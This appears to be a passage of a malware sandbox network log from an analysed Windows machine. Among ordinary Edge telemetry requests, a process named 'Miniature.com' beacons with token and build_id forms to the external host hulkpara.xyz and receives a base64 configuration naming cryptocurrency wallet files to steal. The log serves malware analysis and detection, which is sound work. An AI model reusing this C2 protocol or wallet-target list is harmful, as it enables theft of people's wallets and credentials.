                                                                                                                                                                                                                                                                                          2024-12-19 07:14:05 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:05 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:05 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:05 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:05 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:12 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:14:12 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          32192.168.2.749836108.139.47.1084431504C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:06 UTC1012OUTGET /b2?rn=1734597969348&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=08F1B41B03E76B2C0A73A14102FE6A7B&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                          Cookie: UID=1D5eb283802c974f6e27c9d1734592444; XID=1D5eb283802c974f6e27c9d1734592444
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:06 UTC326INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:14:06 GMT
                                                                                                                                                                                                                                                                                          Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                          Via: 1.1 008cd6752eb718142dfefe2f7e847982.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                          X-Amz-Cf-Pop: JFK50-P1
                                                                                                                                                                                                                                                                                          X-Amz-Cf-Id: BgUnGxJWHYaiuvJoNveC9CAmJO_It8E7qmtSwwCZNYVX2ZXMbimuXA==


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          33192.168.2.74983452.168.117.1684431504C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:06 UTC1082OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734597969345&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Content-Length: 3868
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                          Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                          Cookie: _C_ETH=1; USRLOC=; MUID=08F1B41B03E76B2C0A73A14102FE6A7B; _EDGE_S=F=1&SID=1A9F6908BECB617B0DA87C52BF7E6078; _EDGE_V=1
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:06 UTC3868OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 50 61 67 65 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 31 39 54 30 38 3a 34 36 3a 30 39 2e 33 34 31 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 63 63 37 34 34 62 30 36 2d 66 65 64 38 2d 34 33 66 35 2d 39 65 39 62 2d 65 64 30 39 63 34 34 35 39 39 33 36 22 2c 22 65 70 6f 63 68 22 3a 22 32 33 37 37 31 38 39 37 39 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                                                                                                                                                          Data Ascii: {"name":"MS.News.Web.PageView","time":"2024-12-19T08:46:09.341Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"cc744b06-fed8-43f5-9e9b-ed09c4459936","epoch":"237718979"},"app":{"locale"
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:06 UTC894INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                          P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                          Set-Cookie: MC1=GUID=bc2565e47c104127ab00e5380c445c3b&HASH=bc25&LV=202412&V=4&LU=1734592446543; Domain=.microsoft.com; Expires=Fri, 19 Dec 2025 07:14:06 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                          Set-Cookie: MS0=d9203e547fe94d2c85c86b9ae935720e; Domain=.microsoft.com; Expires=Thu, 19 Dec 2024 07:44:06 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                          time-delta-millis: -5522802
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:14:05 GMT
                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          34192.168.2.74984294.130.191.1684437416C:\Users\user\AppData\Local\Temp\325114\Miniature.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:06 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----EK6XT0RIWTRQQQI5XT00
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: hulkpara.xyz
                                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:06 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 45 4b 36 58 54 30 52 49 57 54 52 51 51 51 49 35 58 54 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 32 34 63 61 32 36 61 66 31 64 63 32 32 39 39 33 37 65 36 33 39 36 66 32 31 32 62 37 31 64 0d 0a 2d 2d 2d 2d 2d 2d 45 4b 36 58 54 30 52 49 57 54 52 51 51 51 49 35 58 54 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 45 4b 36 58 54 30 52 49 57 54 52 51 51 51 49 35 58 54 30 30 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------EK6XT0RIWTRQQQI5XT00Content-Disposition: form-data; name="token"cf24ca26af1dc229937e6396f212b71d------EK6XT0RIWTRQQQI5XT00Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------EK6XT0RIWTRQQQI5XT00Cont
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:07 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:14:07 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:07 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                                                                                                                          Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          35192.168.2.74984320.110.205.1194431504C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:06 UTC1261OUTGET /c.gif?rnd=1734597969347&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=c87c0c2827f044b19e1956450ca6519b&activityId=c87c0c2827f044b19e1956450ca6519b&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=267493DD80724C64AC29441BD36923AF&MUID=08F1B41B03E76B2C0A73A14102FE6A7B HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: c.msn.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                          Cookie: USRLOC=; MUID=08F1B41B03E76B2C0A73A14102FE6A7B; _EDGE_S=F=1&SID=1A9F6908BECB617B0DA87C52BF7E6078; _EDGE_V=1; SM=T
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:07 UTC982INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 10 Dec 2024 13:00:24 GMT
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          ETag: "9270eb7934bdb1:0"
                                                                                                                                                                                                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                          X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                          P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                                                          Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                          Set-Cookie: MUID=08F1B41B03E76B2C0A73A14102FE6A7B; domain=.msn.com; expires=Tue, 13-Jan-2026 07:14:07 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                                          Set-Cookie: SRM_M=08F1B41B03E76B2C0A73A14102FE6A7B; domain=c.msn.com; expires=Tue, 13-Jan-2026 07:14:07 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                          Set-Cookie: MR=0; domain=c.msn.com; expires=Thu, 26-Dec-2024 07:14:07 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                          Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Thu, 19-Dec-2024 07:24:07 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:14:06 GMT
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Content-Length: 42
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:07 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b
                                                                                                                                                                                                                                                                                          Data Ascii: GIF89a!,L;


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          36192.168.2.74985094.130.191.1684437416C:\Users\user\AppData\Local\Temp\325114\Miniature.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:08 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----H4O8GV3OZMOZMYMG4WTR
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: hulkpara.xyz
                                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:08 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 48 34 4f 38 47 56 33 4f 5a 4d 4f 5a 4d 59 4d 47 34 57 54 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 32 34 63 61 32 36 61 66 31 64 63 32 32 39 39 33 37 65 36 33 39 36 66 32 31 32 62 37 31 64 0d 0a 2d 2d 2d 2d 2d 2d 48 34 4f 38 47 56 33 4f 5a 4d 4f 5a 4d 59 4d 47 34 57 54 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 48 34 4f 38 47 56 33 4f 5a 4d 4f 5a 4d 59 4d 47 34 57 54 52 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------H4O8GV3OZMOZMYMG4WTRContent-Disposition: form-data; name="token"cf24ca26af1dc229937e6396f212b71d------H4O8GV3OZMOZMYMG4WTRContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------H4O8GV3OZMOZMYMG4WTRCont
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:09 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:14:09 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
